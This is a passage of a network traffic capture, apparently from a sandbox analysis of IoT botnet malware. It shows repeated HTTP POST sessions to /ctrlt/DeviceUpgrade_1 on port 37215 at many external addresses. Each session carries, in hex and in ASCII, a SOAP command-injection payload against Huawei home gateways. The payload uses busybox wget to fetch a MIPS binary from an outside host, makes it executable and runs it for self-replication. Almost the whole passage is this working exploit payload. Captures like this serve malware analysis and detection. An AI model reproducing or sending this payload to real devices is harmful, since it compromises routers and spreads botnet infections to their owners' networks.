                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    67192.168.2.1443418197.107.22.16137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.135195971 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.501240015 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    68192.168.2.143436441.68.57.16637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.136123896 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.547111988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    69192.168.2.1436912197.211.212.837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.136123896 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.547111988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    70192.168.2.1437448197.77.24.8937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.136584044 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    71192.168.2.145042041.30.137.21237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.136584044 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
